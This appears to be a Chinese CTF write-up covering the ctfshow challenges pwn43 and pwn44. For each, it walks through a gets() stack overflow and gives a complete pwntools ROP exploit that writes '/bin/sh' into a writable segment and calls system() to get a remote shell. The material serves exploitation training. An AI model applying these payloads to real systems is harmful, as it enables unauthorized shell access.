pwn43
首先我们先将pwn文件下载下来,然后拖入到虚拟机中查看保护信息。
chmod +x pwn
checksec pwn
我们可以看到,文件只开启了栈不可执行,并且是32位的文件。
我们将文件拖入到ida32中反编译一下。
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();
logo();
ctfshow();
return 0;
}
char *ctfshow()
{
char s[104]; // [esp+Ch] [ebp-6Ch] BYREF
return gets(s);
}
int hint()
{
unsigned int v0; // eax
int result; // eax
int v2; // [esp+8h] [ebp-10h] BYREF
int v3; // [esp+Ch] [ebp-Ch]
v0 = time(0);
srand(v0);
v3 = rand();
__isoc99_scanf("%d", &v2);
result = v2;
if ( v3 == v2 )
return system("where is shell?");
return result;
}
我们可以很清晰的看到,在ctfshow函数中,用到gets函数读取数据到s中,由于gets函数读取数据没有长度限制,显然存在栈溢出。并且我们在hint函数中发现了system函数,但是我们却找不到/bin/sh和sh。
这就很头疼,这时我们可以使用gdb查看一下是否还有可以进行写权限的数据段,如果有,那我们就可以使用这个段里的数据单元,通过gets函数将/bin/sh或者sh写入到这个数据单元中,在以该数据单元的地址作为参数传入到system函数,就可以拼凑出system(“/bin/sh”)了,进而拿到服务器的权限。
我们运行gdb
先随便打一个断点,我这里在main函数开始出下断点。
之后再使用r运行程序。
然后使用vmmap命令即可观察到各段的权限信息。
gdb pwn
b main
r
vmmap
我们看到DATA的0x804b000~0x804c000区间有写(w)的权限,那我们就可以利用这个段来写入我们的/bin/sh。
编写exp
计算溢出长度
我们可以看到s再ebp上面6Ch处,加上ebp所占栈单元的4字节,那么溢出长度就为:0x6C + 0x4
拿到system函数和gets函数的地址
我们使用objdump命令获取文件的plt表,进而直接拿到system函数和gets函数的地址。
objdump -d -j .plt pwn
gets函数的地址:0x08048420
system函数的地址:0x08048450
写入/bin/sh
上面我们分析到,我们可以利用0x804b000~0x804c000区间的数据单元,我们就利用0x804c000-16位置的数据单元即可。
写exp.py
from pwn import *
io = remote("pwn.challenge.ctf.show", "28117")
offset = 0x6c + 0x4
binsh_addr = 0x804c000-16
system_addr = 0x08048450
gets_addr = 0x08048420
payload = offset * 'a'
payload += p32(gets_addr)
payload += p32(system_addr) # 作为gets函数的返回地址,返回到system函数中
payload += p32(binsh_addr) # gets函数的参数,也是system函数的返回地址(是无效的)
payload += p32(binsh_addr) #system函数的参数
io.recv()
io.sendline(payload)
io.sendline("/bin/sh")
io.interactive()
成功拿到flag。
pwn44
我们还是先将文件下载下来,然后拖入到虚拟机中查看保护信息。
chmod +x pwn
checksec pwn
我们看到,该文件与上道题目的文件一样,都只开启了栈不可执行。差别是这个文件是64位的,那我们就先把文件拖入到ida64中反编译一下。
int __cdecl main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);
logo();
puts("get system parameter!");
ctfshow();
return 0;
}
__int64 ctfshow()
{
char v1[10]; // [rsp+6h] [rbp-Ah] BYREF
return gets(v1);
}
int hint()
{
return system("no shell for you");
}
思路大概跟上道题目一样,ctfshow函数使用了gets函数,明显有栈溢出,hint函数中system函数,但是却找不到/bin/sh和sh,所以我们还是利用gdb来查看一下文件中是否有可以写入权限的段。
gdb pwn
b main
r
vmmap
我们看到,DATA段的0x602000~0x603000区间,是有写(w)权限的。我们就可以利用gets函数,来将/bin/sh读入该段的数据单元中,然后将该数据单元的地址作为参数传入到system函数中,就可以构造处system(“/bin/sh”)进而拿到服务器的shell。
其次,64位需要堆栈平衡。并且64位的传参和32位也不一样。
具体64位传参方式如下:
当参数少于7个时, 参数从左到右放⼊寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时, 前 6 个与前⾯⼀样, 但后⾯的依次从 “右向左” 放⼊栈中,和32位汇编⼀样。
编写exp
计算溢出长度
在ctfshow函数中,v1的位置在rbp上面Ah处,加上rbp本身所占栈单元的大小8个字节(32位为4字节,64位为8字节),那么溢出长度就为:0xa + 0x8
拿到system函数和gets函数的地址
还是利用objdump命令来获取文件的plt表,进而直接拿到gets函数和system函数的地址。
objdump -d -j .plt pwn
system函数的地址为:0x0000000000400520
gets函数的地址为:0x0000000000400530
拿到pop rdi;ret和ret的地址
使用ROPgadget命令可以获取。
ROPgadget --binary pwn --only "pop|ret"
pop rdi;ret的地址为:0x00000000004007f3
ret的地址为:0x00000000004004fe
ret是为了64位的堆栈平衡,具体堆栈平衡的知识可以看一下两篇文章
https://www.cnblogs.com/ZIKH26/articles/15996874.html
https://blog.youkuaiyun.com/hu_c_t_f/article/details/131902515
写入/bin/sh
上面我们分析到,我们可以利用0x602000~0x603000区间的数据单元,我们就利用0x603000-16位置的数据单元即可。
写exp.py
from pwn import *
io = remote("pwn.challenge.ctf.show", "28284")
offset = 0xa + 0x8
system_addr = 0x0000000000400520
gets_addr = 0x0000000000400530
binsh_addr = 0x603000-16
pop_rdi = 0x00000000004007f3
ret = 0x00000000004004fe
payload = offset * 'a'
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(gets_addr)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
io.recv()
io.sendline(payload)
io.sendline("/bin/sh")
io.interactive()
成功拿到flag。
扫一扫
570
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
